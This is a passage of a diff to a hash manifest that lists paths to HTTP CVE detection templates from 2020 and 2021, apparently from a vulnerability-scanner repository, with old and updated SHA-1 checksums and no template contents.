-http/cves/2020/CVE-2020-9047.yaml:189f7f8469f0e92040ea2aefe2c000002f630546 -http/cves/2020/CVE-2020-9054.yaml:714e6ccc2eda83b20713c0d80a6f8ef0d78f38a9 +http/cves/2020/CVE-2020-8654.yaml:b82a3aae9a47aa5f992a6b46f465a3fa173bd65f +http/cves/2020/CVE-2020-8771.yaml:a0cc7f59212a367e8d7cd687596ac445bb8b298d +http/cves/2020/CVE-2020-8772.yaml:a2bd5d29ad9d90b3cf494080500b931fb37fc84c +http/cves/2020/CVE-2020-8813.yaml:48b9c26b011266f28d05e2e10f5034fd10056ead +http/cves/2020/CVE-2020-8982.yaml:4852af33d6d383648ddc61b53b3d57fb66bb469c +http/cves/2020/CVE-2020-9036.yaml:180dfb79cb206d4660eb6652483829fa5642d64a +http/cves/2020/CVE-2020-9043.yaml:8a3079984507fb7f501fd81fba7b3d6b1f244cb2 +http/cves/2020/CVE-2020-9047.yaml:584f70ef8431e931e64c5b9b9198c2a71de1cf72 +http/cves/2020/CVE-2020-9054.yaml:71bae0ab4a1c436887a23ac13b600d514c11f1e2 http/cves/2020/CVE-2020-9315.yaml:3657abafa7e82d3df7a8a9aec48a4cc1abd25ec8 -http/cves/2020/CVE-2020-9344.yaml:8b86bb852d74c9a58705d50502d2a0c88df2243e +http/cves/2020/CVE-2020-9344.yaml:2e6cdbb66354530742176eb12085c1b9aeec1b75 http/cves/2020/CVE-2020-9376.yaml:e1884c7dc54ac9aaaaf94b09377ae61949e8bcf6 -http/cves/2020/CVE-2020-9402.yaml:13fdce0ffe04e39af52abaae3e5b593371e0a5e8 -http/cves/2020/CVE-2020-9425.yaml:285152ba6f3c1a32a047104b9cf0419a6ac1056a -http/cves/2020/CVE-2020-9483.yaml:ec5cb2d37cc78ca45d96a75217d1895d1c72f55f +http/cves/2020/CVE-2020-9402.yaml:ff88608fa13c99e01669512535d1625e6284efc2 +http/cves/2020/CVE-2020-9425.yaml:874f12c24ecd4662dc45bbc12e225cbb9e786ce7 +http/cves/2020/CVE-2020-9483.yaml:a7549d856cab999496bf5842e1b9bd4c1f7c8a5f http/cves/2020/CVE-2020-9484.yaml:815c7c2a7b9d1b8abf607e9033b8adc5d08e3b2f http/cves/2020/CVE-2020-9496.yaml:1f044636ea79356fdf85ca366d02552181a05418 -http/cves/2020/CVE-2020-9757.yaml:34513ff0f7972ce4ced689453e191ca71d9c4f71 +http/cves/2020/CVE-2020-9757.yaml:508f251a36d0f429e8f654142e9b5358945c272a http/cves/2021/CVE-2021-1472.yaml:97bfecca2f4722d467e32cd70d02abddd22d35bd -http/cves/2021/CVE-2021-1497.yaml:50ea704c7a0df520e17f238c0db41227d0e7f117 -http/cves/2021/CVE-2021-1498.yaml:042494bef8c3e2da90078084d670bd23eb643c35 -http/cves/2021/CVE-2021-1499.yaml:9214454291966545ab60910b2ba151ea0dc65057 -http/cves/2021/CVE-2021-20031.yaml:d245251d75e5212383a8f757f63e3ec76f8dc812 -http/cves/2021/CVE-2021-20038.yaml:ed20ff75c02161a7ee305c9e569645dd14a1c7e5 +http/cves/2021/CVE-2021-1497.yaml:9fc4d8e24465e774f29dd9b51fe014a7a9d0df96 +http/cves/2021/CVE-2021-1498.yaml:e7b29689cf5fdff36c603f4f71c9e6f20603795e +http/cves/2021/CVE-2021-1499.yaml:e3ceb7053572f39bbd15864bade47259cda942ea +http/cves/2021/CVE-2021-20031.yaml:e6ae2de06484705bbf6e6fb4a1f0e66aad0b08d1 +http/cves/2021/CVE-2021-20038.yaml:33dc111a4940d8385c9b932e60120dbdd5f85f11 http/cves/2021/CVE-2021-20090.yaml:a4ffa0566c96bb048572edac36605f7232118973 -http/cves/2021/CVE-2021-20091.yaml:2e98f53438b0be1666bb5d68b72c8a673a232a60 -http/cves/2021/CVE-2021-20092.yaml:f1c54665b51f0bb0f19509d62518f980f5ad5da4 -http/cves/2021/CVE-2021-20114.yaml:45635d41f84d240e2bce878a2aacf7b6559b415a -http/cves/2021/CVE-2021-20123.yaml:d29c80e14c338515c0c9a1c99331a97fe4ef834c -http/cves/2021/CVE-2021-20124.yaml:7fbb2c24876d55fb5a3e92441610509878fe6eb6 +http/cves/2021/CVE-2021-20091.yaml:a299411a92c011754c2d6379a49392ac81149541 +http/cves/2021/CVE-2021-20092.yaml:856d8cf314e4003fabf840379255bd0fe197ead6 +http/cves/2021/CVE-2021-20114.yaml:3d0e0a42190d4d09033a2f5d9b719a5bcc54e342 +http/cves/2021/CVE-2021-20123.yaml:9c39518aec628d396a2f534511b576881cc4aa7c +http/cves/2021/CVE-2021-20124.yaml:8a4e894b2d964652d901352c7ce278250a7302b8 http/cves/2021/CVE-2021-20137.yaml:62ef1047f147feec4b3332ad6b23fff63c0596f2 -http/cves/2021/CVE-2021-20150.yaml:cf6fb12505b0732931044c69e9dbdbb5bd265715 -http/cves/2021/CVE-2021-20158.yaml:6881b22e1236bea94f95b0ba590c3752fbe68f52 -http/cves/2021/CVE-2021-20167.yaml:d8d2e72a29b3762db1e306289d754a2d113e0a7e -http/cves/2021/CVE-2021-20323.yaml:a251c33e072f65737edb75ec5208f565f9c1ab78 -http/cves/2021/CVE-2021-20792.yaml:05f000572956c1dacb9a9113e5e25c3b13f11ff9 +http/cves/2021/CVE-2021-20150.yaml:36f90a6249206128e661ca25020bf73843949b2b +http/cves/2021/CVE-2021-20158.yaml:a7fd8a1e0b13a0a542c27a941a82e03d7a07b919 +http/cves/2021/CVE-2021-20167.yaml:0029a9aaf27bb8529b6106ad01f227ebed609233 +http/cves/2021/CVE-2021-20323.yaml:dbd7e413b2173a0ec58326d6f1b7186d70480a53 +http/cves/2021/CVE-2021-20792.yaml:96cabc142f21839a8c46b0d576de9cf38dec280a http/cves/2021/CVE-2021-20837.yaml:a821e04c159a69e0512585743f0cf0ed934803e1 -http/cves/2021/CVE-2021-21087.yaml:c0889e178eb34aeb219ce1e026e80c9fbf6bc093 -http/cves/2021/CVE-2021-21234.yaml:fcc35715d7489ad6a6b5d6eafa77305895ff3aee +http/cves/2021/CVE-2021-21087.yaml:4b2db477ba2d2b5f94dd1de93b4caa260f7b10d3 +http/cves/2021/CVE-2021-21234.yaml:46968c448e1cc5986dba26fd540d20a4c4600577 http/cves/2021/CVE-2021-21287.yaml:75130c591fbf9bd6aad57db77a519caae44aff22 http/cves/2021/CVE-2021-21307.yaml:ca94648608cb0d15f982b119247b51d0154efd4b -http/cves/2021/CVE-2021-21311.yaml:98da44522f17a3a0384dca2d3270bae3528a81f1 -http/cves/2021/CVE-2021-21315.yaml:b994c3938dd7a1c8db4f038806e8599d7df6bbba -http/cves/2021/CVE-2021-21345.yaml:da1fff90363791c5413e01fd609aa7fd703177e1 +http/cves/2021/CVE-2021-21311.yaml:aaf3756d23ce8d179f83c88fdd1c1a8945e4bb28 +http/cves/2021/CVE-2021-21315.yaml:9005418bc0e4f4096cbcd8fb51f2e2b2e583b4bc +http/cves/2021/CVE-2021-21345.yaml:24a18d23be7c50ed523eb374e34fd33fdcad8c22 http/cves/2021/CVE-2021-21351.yaml:5d84d377a0d325248c8da374d32ef8f881278fdc -http/cves/2021/CVE-2021-21389.yaml:dac42f78524e850b3d2df73d415a15855d2fd170 -http/cves/2021/CVE-2021-21402.yaml:fa0c6e11ff65eb9a9224b903903ea82588d7f1af -http/cves/2021/CVE-2021-21479.yaml:3aa5f04ce108c7167ee351f07a1d0f56548f7be8 -http/cves/2021/CVE-2021-21745.yaml:834f19f04d1e1e3b2333b625fd3bdf4e16cb8361 -http/cves/2021/CVE-2021-21799.yaml:ee560c978d39f9cacdb08059405fb8a3ad639745 -http/cves/2021/CVE-2021-21800.yaml:5e0c636d8854f9b8507bb1cbec63cd525ca1b7e5 -http/cves/2021/CVE-2021-21801.yaml:94717ec08ac77b2053f56b4e6ae52db7355abcb5 -http/cves/2021/CVE-2021-21802.yaml:3fc8f0c5eb7db6729dacfee330ee72d7509ae807 -http/cves/2021/CVE-2021-21803.yaml:9cf6ae88f05b2dfd3af92dfc1f8294d469ed0a34 +http/cves/2021/CVE-2021-21389.yaml:743111929a88a779ed2e42c7e65ae60294bac17b +http/cves/2021/CVE-2021-21402.yaml:e5617e43cf54ec3c6f9fb83915a9e3ed308ed4c3 +http/cves/2021/CVE-2021-21479.yaml:8920f2889e995a4a15eb9e12be955bfdcff9f5fa +http/cves/2021/CVE-2021-21745.yaml:c50035acd30de541405963ee50541a41ed0ab0da +http/cves/2021/CVE-2021-21799.yaml:3f38d0d07ed61bcba9e6faba11bd9e5f9746ba90 +http/cves/2021/CVE-2021-21800.yaml:5f0d7437908e7c1523f525d3c0242be5c7eea93a +http/cves/2021/CVE-2021-21801.yaml:1da8c7e5167e43250fa81cd317e9a7aed0bb7a88 +http/cves/2021/CVE-2021-21802.yaml:7771df50fead5b93cebe61c5fd4d6d1f3eda1226 +http/cves/2021/CVE-2021-21803.yaml:d7038d7be3185d4653fe2eefd4760c4c29d3cd98 http/cves/2021/CVE-2021-21805.yaml:3c3c0f43097f85e2a4501004935488ef6dab3cc8 -http/cves/2021/CVE-2021-21816.yaml:2a4826c818a5027bbc20129453d1f3fb17713a95 +http/cves/2021/CVE-2021-21816.yaml:f51a54944e943d579986c24a41c39310961628a1 http/cves/2021/CVE-2021-21881.yaml:2ffe34dd6323d89ef22e8faba52f181d7c26bc7f http/cves/2021/CVE-2021-21972.yaml:84cb59d6023063941fb0adbdd2ed34de0db43ad2 http/cves/2021/CVE-2021-21973.yaml:9ad7af1522f366171b906af28b9c445d6a872944 http/cves/2021/CVE-2021-21975.yaml:cdb3b61d0b913abc785a21a7df2bb391e41fc595 -http/cves/2021/CVE-2021-21978.yaml:4620dbd6245be5b64f9a6c57efe623608c563d88 -http/cves/2021/CVE-2021-21985.yaml:346124ac75f7593d5bfe13cf2ee36ccef486c788 -http/cves/2021/CVE-2021-22005.yaml:4396a72fc5eaa62bdb0a21e5bccdc3d10b297e8a -http/cves/2021/CVE-2021-22053.yaml:8c3a5eba8547a35001e26a7d858cb50fa65e77f1 -http/cves/2021/CVE-2021-22054.yaml:805394f20c30e2f187034a37e186f6b387bea670 -http/cves/2021/CVE-2021-22122.yaml:172803b52bc5e08bed148a3522179732f140ec74 +http/cves/2021/CVE-2021-21978.yaml:37440367eb991f4cf71867605411b8ae353e4acd +http/cves/2021/CVE-2021-21985.yaml:932ebb8b757c762723a1e81b4ee14095b0a3cc80 +http/cves/2021/CVE-2021-22005.yaml:6830ba71c7ffec3e18015d91f1bcc588b1aa1448 +http/cves/2021/CVE-2021-22053.yaml:db9f11a97df95bd9f87d9b6e66443fed363a00c4 +http/cves/2021/CVE-2021-22054.yaml:2a932098f6285ca856b30e3cef6c5b068962f309 +http/cves/2021/CVE-2021-22122.yaml:6c9230a49d36ade5237e9f7b96194870db841f21 http/cves/2021/CVE-2021-22145.yaml:061d6f29b3956230213b5f2765f3f7b3be613d55 http/cves/2021/CVE-2021-22205.yaml:d8ec11e15fb108ea3c81d5ece2d022efe641c046 http/cves/2021/CVE-2021-22214.yaml:84c6ce20b0da21c9ca1b605dea484294aa1ad51a http/cves/2021/CVE-2021-22502.yaml:d83a7f4e605208a5364ac504e6943ff0d1605a34 -http/cves/2021/CVE-2021-22707.yaml:dc6068d5b852ceefa31272fc77937c46979b1006 -http/cves/2021/CVE-2021-22873.yaml:8352400998792c6cb79dded88d2dfbbc9764eb23 -http/cves/2021/CVE-2021-22911.yaml:4b407c6350a23cc82eb2b6c970e5eee007e6e074 +http/cves/2021/CVE-2021-22707.yaml:3c1e82238aa4c7992a38df89b21a6f7ce0cd542a +http/cves/2021/CVE-2021-22873.yaml:70b9653f388aa9127a69c6a5eba8015d171d0957 +http/cves/2021/CVE-2021-22911.yaml:94da2cb821f8f448e1a4bac5e17ce0a3b4b273c2 http/cves/2021/CVE-2021-22986.yaml:8d4709f638cbb498f9b9d8899ff09244417ca816 -http/cves/2021/CVE-2021-23241.yaml:60c025ea70e306335cd79b3ff17fccff6913c653 -http/cves/2021/CVE-2021-24145.yaml:c5a2cf5928d6041238f1d43ebd70de1fcc7372db -http/cves/2021/CVE-2021-24146.yaml:5b477fc9413a619e673d6203cf465970764b64b4 -http/cves/2021/CVE-2021-24150.yaml:ef169e062dc52751c4dd6ff7e3190799c27dc3bf -http/cves/2021/CVE-2021-24155.yaml:84ab05762d90a2950a8d309006297434ab9d9750 -http/cves/2021/CVE-2021-24165.yaml:9279d25ad04d5b76fb381cd604d1064e73459589 -http/cves/2021/CVE-2021-24169.yaml:1cfe9f732491b0c0e550045f2580fb7096a7879e -http/cves/2021/CVE-2021-24176.yaml:99c89872e8d63f0c7fd33367e3746208d4112d08 -http/cves/2021/CVE-2021-24210.yaml:9be182658d81a9376e89e7fa2eba42659af4d8fd -http/cves/2021/CVE-2021-24214.yaml:f3b174ce547254a8ef9a3fd26439f07e3754ada0 -http/cves/2021/CVE-2021-24215.yaml:37e787401f371f016bf6c295fb2d25a23014ad9b -http/cves/2021/CVE-2021-24226.yaml:f474f274d08d51f4b865181ff1c32d37a559edd2 -http/cves/2021/CVE-2021-24227.yaml:97f5149f168970bce5b530540cbd85066b1996aa -http/cves/2021/CVE-2021-24235.yaml:083fbf16f9362390cf24d5d5237ca113616a3535 -http/cves/2021/CVE-2021-24236.yaml:945d62479dae4909c79d980fd2561252ac2d0dd0 -http/cves/2021/CVE-2021-24237.yaml:1a12db523b42c1e40669386abb4a4c6eb73b397a -http/cves/2021/CVE-2021-24239.yaml:8befb90d4ec42bd18793420879026e883246ce9f -http/cves/2021/CVE-2021-24245.yaml:96a9e7c86ebf2d09e5ba290899eb30c7eaefa950 -http/cves/2021/CVE-2021-24274.yaml:38fc0c3e96af1c5a8c706a131436086239313322 -http/cves/2021/CVE-2021-24275.yaml:04fd037047048cb625330513ced07ed7925877dc -http/cves/2021/CVE-2021-24276.yaml:11907bc4c1923669941652ba92f5b65b0a8ff872 -http/cves/2021/CVE-2021-24278.yaml:04486e4ea61942562b1c422fa59889c0cb95f67d -http/cves/2021/CVE-2021-24284.yaml:a2987d890d1707086d98ca48c3abe8b66925d628 -http/cves/2021/CVE-2021-24285.yaml:d25456a0bfffc39922bd884db75fc1d0a4df3b36 -http/cves/2021/CVE-2021-24286.yaml:17f315b2bea2f30cfd3b6f469808282f02fa5dc8 -http/cves/2021/CVE-2021-24287.yaml:484f67ebbb7511174263ce8a508c9da60bdfacc6 -http/cves/2021/CVE-2021-24288.yaml:86ca9d073140a165167e71ea0d99fdbbd1b61d2b -http/cves/2021/CVE-2021-24291.yaml:ab7903d0e9dced69f7696cbd884fb35e7573da50 -http/cves/2021/CVE-2021-24298.yaml:efbe6e8422a6a2b61c3de206ced39c5876044fc1 -http/cves/2021/CVE-2021-24300.yaml:8b1825ade4d5279ed1e8bbfcf7ffdb06f250fa3a -http/cves/2021/CVE-2021-24316.yaml:fb68557b9ef830bc51200a04a092b619b481c101 -http/cves/2021/CVE-2021-24320.yaml:479642976de338264cc39f2332631ad838f685bf -http/cves/2021/CVE-2021-24335.yaml:a3679430f7d4ffeef6bb6979b6ed7064b958268b -http/cves/2021/CVE-2021-24340.yaml:6e82ad636c45ac565ce900f12ed94e004900179d -http/cves/2021/CVE-2021-24342.yaml:fc3e5033efce736aeb969e6a0c8c700769fc3815 +http/cves/2021/CVE-2021-23241.yaml:10a6f5d44362c51d6f41b3aebf0965eac6ba6154 +http/cves/2021/CVE-2021-24145.yaml:43f45f2253d5d06c62e54f74883dc5887620a626 +http/cves/2021/CVE-2021-24146.yaml:3b74a70f5a301f901b32a4c501cdc3b5eef49e6f +http/cves/2021/CVE-2021-24150.yaml:2c47d6ade53e2671b2fcbe85c57c6a340d3fe6e6 +http/cves/2021/CVE-2021-24155.yaml:c5347f2ff82173bace6a703cfd25e6586d1e4065 +http/cves/2021/CVE-2021-24165.yaml:a66373c88c054a4435f1f754c2c7987bd46ce825 +http/cves/2021/CVE-2021-24169.yaml:5ac6b98aea4b1f9d89e48582a0762dba98998721 +http/cves/2021/CVE-2021-24176.yaml:3a91249a4419ae133713187bf702583965564486 +http/cves/2021/CVE-2021-24210.yaml:8a77dc6466a4dbeb41f0b8da730f304f5cbc8645 +http/cves/2021/CVE-2021-24214.yaml:269f1897f6f3092e48a85b88e4571f045cde1760 +http/cves/2021/CVE-2021-24215.yaml:244d34f42b95e415b070ddc3772b3178712bb10c +http/cves/2021/CVE-2021-24226.yaml:83f2a0c62ce36e6ccf774f89943fbec98ee02d2a +http/cves/2021/CVE-2021-24227.yaml:454d92481361cc5d69c5629c609ec17eb7d17c46 +http/cves/2021/CVE-2021-24235.yaml:a078f06f288e0fa09658c2f0d747444441aff86f +http/cves/2021/CVE-2021-24236.yaml:6abf1dbe80e16d90335ddb766737b2f1cdd3e5ba +http/cves/2021/CVE-2021-24237.yaml:8b6626073c728248a3786819a13013ea15174eae +http/cves/2021/CVE-2021-24239.yaml:9a9fbbabddbe77599035f4f4d4e5999f771246bd +http/cves/2021/CVE-2021-24245.yaml:e7abb5978b9a32fad898e76a8fb17b344ae6a983 +http/cves/2021/CVE-2021-24274.yaml:3f51492d276111d91dbbb687734bc305dbbf28df +http/cves/2021/CVE-2021-24275.yaml:c623247ab0197cb040df2d14690415323710dd8b +http/cves/2021/CVE-2021-24276.yaml:0b469b4696f3e33647bde488c5b8c9f6a4f4a2b1 +http/cves/2021/CVE-2021-24278.yaml:17b38f85a860bb561ef89893cd6429c4a9648719 +http/cves/2021/CVE-2021-24284.yaml:e7433d52fd63b30291d5fb6a48a7210b00bb4b5d +http/cves/2021/CVE-2021-24285.yaml:4d08bd59c0d1074300d7b1f002cb2833eb54ef67 +http/cves/2021/CVE-2021-24286.yaml:4efe15d6fd7635893d5e75921fe1c283acd81bf2 +http/cves/2021/CVE-2021-24287.yaml:5c1827d1e085e2ec985c7477da0c1bc84b4f4f68 +http/cves/2021/CVE-2021-24288.yaml:fc8938fdaebd1c7b95e99e588a1492a52794cc5b +http/cves/2021/CVE-2021-24291.yaml:b52d2084bd4d22124a747052c4f4107a4bf06a2c +http/cves/2021/CVE-2021-24298.yaml:ae20b3ba87129aeea69532eec54e0fb37d6544fe +http/cves/2021/CVE-2021-24300.yaml:4c114942137f191377b5c1070b39907371bb85fe +http/cves/2021/CVE-2021-24316.yaml:51266f318a61a8d7742a801ef8e4e110f7fae152 +http/cves/2021/CVE-2021-24320.yaml:9ca83296e907bba0690193753deb373109bd95e6 +http/cves/2021/CVE-2021-24335.yaml:a2d60b9513b2395d0ce73fa621ca00874c18f324 +http/cves/2021/CVE-2021-24340.yaml:1a7cb0a5a891083bc825e84cfdcd7b5273965c2d +http/cves/2021/CVE-2021-24342.yaml:0d8d4a006b8c96b3e830cc6c1b995e41bb28aee4 http/cves/2021/CVE-2021-24347.yaml:80091b8a106b2f188ac6e0e22dea99c2e1665208 -http/cves/2021/CVE-2021-24351.yaml:988891b2f61b5aa8cf0d5f1ff9ba36d29a1abcea -http/cves/2021/CVE-2021-24358.yaml:4ba69e348ff893110a088e717a9319731778979c -http/cves/2021/CVE-2021-24364.yaml:1d6ca3f9f29c033c8794e3cc190f59ea812b6e61 -http/cves/2021/CVE-2021-24370.yaml:e7f42ca2bf5d6df911f4d97f9fc3253dd2a20e1c -http/cves/2021/CVE-2021-24387.yaml:2d873e2f391b44a8d1b2881500f88723f7bf0a04 -http/cves/2021/CVE-2021-24389.yaml:3b1562b76e7f97eb4ad5234d6dcdbb4cf9230a2a -http/cves/2021/CVE-2021-24406.yaml:a83b574b9ed6b4bfee0bfeec751dfe532f19f768 -http/cves/2021/CVE-2021-24407.yaml:b58bf2226d32235fa9da34003271021970d64dd7 -http/cves/2021/CVE-2021-24409.yaml:e09511abe5e7f04b02f281ee7b679bcd3fefd4a9 -http/cves/2021/CVE-2021-24435.yaml:3c774292c301883d3ed2bbf193d0c29a72405186 -http/cves/2021/CVE-2021-24436.yaml:d89cceb76042202767db98b8f58a3004bcd9fda7 -http/cves/2021/CVE-2021-24452.yaml:a30546f3d6bcd2238067d3cfddb42df67dda24bc -http/cves/2021/CVE-2021-24472.yaml:1f570966ea109f190221bcf4d5f7b63bd1cb5d33 -http/cves/2021/CVE-2021-24488.yaml:fbd7ff25ac191b274c8f072841739ab394bba896 -http/cves/2021/CVE-2021-24495.yaml:f433cd858b353d44a6e1fb9a5af8e384f45bedca -http/cves/2021/CVE-2021-24498.yaml:76c5ce889eebd1123a0312827f275a7b81afeac6 -http/cves/2021/CVE-2021-24499.yaml:57d7104d127d02cb887bf0339c9cb1f2bb97794f -http/cves/2021/CVE-2021-24510.yaml:49fb8d06e1fb074ee5251453d87487b0bdcb32c0 -http/cves/2021/CVE-2021-24554.yaml:7c5f8860473adfcefce59d363b981dec52269bc6 -http/cves/2021/CVE-2021-24627.yaml:b79f141080828d4a2c4ce59ce1b80401cb1cd6f9 -http/cves/2021/CVE-2021-24647.yaml:df8bac4243c9ca733978f3300e24f5a3c7d08fa0 -http/cves/2021/CVE-2021-24666.yaml:f766354c9885a38aa94ca0a9aea5492b049b251f -http/cves/2021/CVE-2021-24731.yaml:dcd038ea0323a2894253e472903700e47699c73f -http/cves/2021/CVE-2021-24746.yaml:59ed9e42e8269ad5a60bcb78e8b61236a313a8fc -http/cves/2021/CVE-2021-24750.yaml:381efb943d6587821807ae04de5a240eeded32aa -http/cves/2021/CVE-2021-24762.yaml:9bc4bd88a1aa0f146ab1828bd5c98ce28a3eae58 -http/cves/2021/CVE-2021-24791.yaml:50b2a4dda4ab633761aef4d11e31c0de2d31d803 -http/cves/2021/CVE-2021-24827.yaml:c3f2cb7a184c1c4d029c25ec91b65a9b8bc6d630 -http/cves/2021/CVE-2021-24838.yaml:8561c193fea12d414a526d828faa156d45643ad5 -http/cves/2021/CVE-2021-24862.yaml:90ababf0643e57fe0eb400c1a3b82ed48ef069bb -http/cves/2021/CVE-2021-24875.yaml:150eccaf7dc58d10cf87ee0783fe4b58e9a27e88 -http/cves/2021/CVE-2021-24891.yaml:9c8010f38f954a4a4604745331c9ed389a06d517 -http/cves/2021/CVE-2021-24910.yaml:8766c90f7ec4c21271dbd16f06d5ae765379cab6 -http/cves/2021/CVE-2021-24915.yaml:4f37d4541102e92d84c1a1b55c9359fe74e4e45e -http/cves/2021/CVE-2021-24917.yaml:d2d32a7c8f1dc7b6ca30a0ed5ac53a03bc3e9ef6 -http/cves/2021/CVE-2021-24926.yaml:630f0f28285692b60c69221635ecf0e76fb8cabb -http/cves/2021/CVE-2021-24931.yaml:338dabf282dff6ad6a2d6c124b286a320bd5826b -http/cves/2021/CVE-2021-24940.yaml:91ae2aee2a8fd935416d4bdaafba67caf663c3e3 -http/cves/2021/CVE-2021-24946.yaml:ea37db9b8de366f034e132642d0fd8df0317814a -http/cves/2021/CVE-2021-24947.yaml:a2397e339fde321360d57b18fee365a5a71dd05b -http/cves/2021/CVE-2021-24956.yaml:c48e57674a6186b7dece56ae2522c82ab439e3d2 -http/cves/2021/CVE-2021-24970.yaml:9eb89a6e138dfbb52f8d736d67d563e36103ca82 -http/cves/2021/CVE-2021-24979.yaml:a925c3019025eb7016bafe84ff3927e5f555a45e -http/cves/2021/CVE-2021-24987.yaml:647a4cf784faad8d45e74e247135b15b4e232449 -http/cves/2021/CVE-2021-24991.yaml:9fbfd8c33a8910bd4f01e2c56e8cd31f1ad1791b -http/cves/2021/CVE-2021-24997.yaml:904ba830da46cce8eb2c3289e59a6256bfab3386 -http/cves/2021/CVE-2021-25003.yaml:09b8f4789392f564c26d487c4ad9617e3b5983aa -http/cves/2021/CVE-2021-25008.yaml:d36db8cbd64fb58806d3cb2c7fbbf5d0133e64be -http/cves/2021/CVE-2021-25016.yaml:3df7459b0f2b38728df15d4297ec72d6a39df9ce -http/cves/2021/CVE-2021-25028.yaml:9f74004a6ead09a72bf6d19f55696f3ec9d2a15a -http/cves/2021/CVE-2021-25033.yaml:9c49375354216293cd490fec843319f08f3325ff -http/cves/2021/CVE-2021-25052.yaml:07d9f9bfd7faa89896eb7c261369c3d4dbe9d405 -http/cves/2021/CVE-2021-25055.yaml:8384fb4a73e86b90c35a3ea7fb7d180ceabc4894 -http/cves/2021/CVE-2021-25063.yaml:f8d56ee1837e025c894927e5e5ab6db6e453633d -http/cves/2021/CVE-2021-25065.yaml:980f8da10fa85af56c5df68a51935cfadaca45e5 -http/cves/2021/CVE-2021-25067.yaml:043bb0cf7a7f12a4092fe4f7208f356bee89cffd -http/cves/2021/CVE-2021-25074.yaml:a38b8004e791c85f1f82ae9f509189ea6c1d0a38 -http/cves/2021/CVE-2021-25075.yaml:6e8238721835d813a7d0249c91198f397146d65e -http/cves/2021/CVE-2021-25078.yaml:1ce32ff1801fdb602d7690ed7d334790780a11e1 -http/cves/2021/CVE-2021-25079.yaml:5f22962bc4a80b76561bc4bbf2da3d0c3601005a -http/cves/2021/CVE-2021-25085.yaml:5d1f6ca3dfe606d23c572ee46e895af6c6abedc6 -http/cves/2021/CVE-2021-25099.yaml:514bf8e6ca39394ac18da1a0a27f1146f4276cfc -http/cves/2021/CVE-2021-25104.yaml:9daae288015b843c66474f198957c11c1aa4ebc1 -http/cves/2021/CVE-2021-25111.yaml:bd6511a1285c3129954737af81d48904b030cb67 -http/cves/2021/CVE-2021-25112.yaml:fc2dcaca5c1bbae7d32bd3e14f46cff36af2cd33 -http/cves/2021/CVE-2021-25114.yaml:7e893b7e055a086a2ee4e06b89d858f644fb1cce -http/cves/2021/CVE-2021-25118.yaml:b62d81764667164de725bc5f146673d455e17be0 -http/cves/2021/CVE-2021-25120.yaml:bfc97d199aa8f37b7d9c5201540786ffde85a6eb -http/cves/2021/CVE-2021-25281.yaml:35d6404d0a0f2c57977661313c7df6dcccfb2178 -http/cves/2021/CVE-2021-25296.yaml:88712b493bb47dc48808397bdad877fdaab83aa4 -http/cves/2021/CVE-2021-25297.yaml:7e79e9a3185bf652cc73b8328d2c4ee5aa0e9d7e -http/cves/2021/CVE-2021-25298.yaml:b8c3413293e541d8e6d024135ee7b38e1ebc425d -http/cves/2021/CVE-2021-25299.yaml:5568bdef888a3d5a05a1ed8e4ec94bd5acb24eaa -http/cves/2021/CVE-2021-25646.yaml:700a6f6a60029d3526add3dfadd6d46af7e682a1 +http/cves/2021/CVE-2021-24351.yaml:ded01785a4b75e97e0e1732b69bc2976af371c10 +http/cves/2021/CVE-2021-24358.yaml:adb7f749c1c043e880ec94aa7c9e3c739ad49b10 +http/cves/2021/CVE-2021-24364.yaml:cd7c962a2071a21eeec8faa89598e594105cb02c +http/cves/2021/CVE-2021-24370.yaml:e761990957cace23d48c6176236f95e6b636a815 +http/cves/2021/CVE-2021-24387.yaml:a4013ae1e7fe56607e72b049e7c831ee37fcc79a +http/cves/2021/CVE-2021-24389.yaml:b7d3ccd0a40e1dd79eded212a8c16c2090f4db47 +http/cves/2021/CVE-2021-24406.yaml:03fdaa0df18c1dc35e9e988f8051cddff6babeea +http/cves/2021/CVE-2021-24407.yaml:ed0d3ed3dfd8f311019f13ff307624e194746fe0 +http/cves/2021/CVE-2021-24409.yaml:079aed2441730be351754df053f8d1f2031005d4 +http/cves/2021/CVE-2021-24435.yaml:c5e3cd2f9c63b206e5eece83811a2929fb19b704 +http/cves/2021/CVE-2021-24436.yaml:7a776835155193766c14e5891edbb98a71328d13 +http/cves/2021/CVE-2021-24452.yaml:f98fe64fa24394fc7932516a198027974ebd3e6a +http/cves/2021/CVE-2021-24472.yaml:812e354819b8d71a27e65e8578f7e6dc7ba1a1fa +http/cves/2021/CVE-2021-24488.yaml:a4bf659a5680b58adaaa53b8c6366dfcad60ee44 +http/cves/2021/CVE-2021-24495.yaml:443a85f6002a1146026f739da2c3cc1d704ab284 +http/cves/2021/CVE-2021-24498.yaml:ef1e28d51c2cc354e2da8a63652163e822ed7a6c +http/cves/2021/CVE-2021-24499.yaml:14f3665e3e1a4dbad309bd67bc57801f00af6a9f +http/cves/2021/CVE-2021-24510.yaml:d2f1be0519fac8f075fa1e9a66458d86ef49902c +http/cves/2021/CVE-2021-24554.yaml:b5b9467c2e3d0e05360491e6d16456bbdf08fa05 +http/cves/2021/CVE-2021-24627.yaml:7b5065bcbfd84695005f75e016df51e8eac83355 +http/cves/2021/CVE-2021-24647.yaml:3e4b6c12cc8f4c46258d04d5949232b6e6c1aa2d +http/cves/2021/CVE-2021-24666.yaml:5259fdbf87f2b62debff24b623044689ddfe079a +http/cves/2021/CVE-2021-24731.yaml:2a79d18ac762fc65fa3adf424a2e09fc47bdabce +http/cves/2021/CVE-2021-24746.yaml:839b340c5fbe40999931dc232f596ecd1d8f6fb5 +http/cves/2021/CVE-2021-24750.yaml:9903d9366ad5372c4699515b3582959d6cd7b952 +http/cves/2021/CVE-2021-24762.yaml:8aa3cbf43e78db8a4a99bc1f8d1514e2770aea7c +http/cves/2021/CVE-2021-24791.yaml:a5a3981ffd24448676650b479229411c5c947c79 +http/cves/2021/CVE-2021-24827.yaml:875306362aa6fcf195b71d5f343187ec70814cd1 +http/cves/2021/CVE-2021-24838.yaml:5a656475638745ef1b2de82889f5913d6f0210ed +http/cves/2021/CVE-2021-24862.yaml:4516f122d2fa9262cf1f5f60617eb25e3a01e57e +http/cves/2021/CVE-2021-24875.yaml:47204d85655c246f05e1c6b4c39468a965ba6891 +http/cves/2021/CVE-2021-24891.yaml:c736912b503f7f6320cfa96ee6e4de6efa83da3f +http/cves/2021/CVE-2021-24910.yaml:80c25afdc908705992bb9183e2aa25b25c849e67 +http/cves/2021/CVE-2021-24915.yaml:603f612c3eae397376cd7d320d38462f1258efdf +http/cves/2021/CVE-2021-24917.yaml:3928c52c0aaf78a66f675c128b0f91706c96d205 +http/cves/2021/CVE-2021-24926.yaml:7f1f5d47cfab11609b20e33dde5abe996107cd21 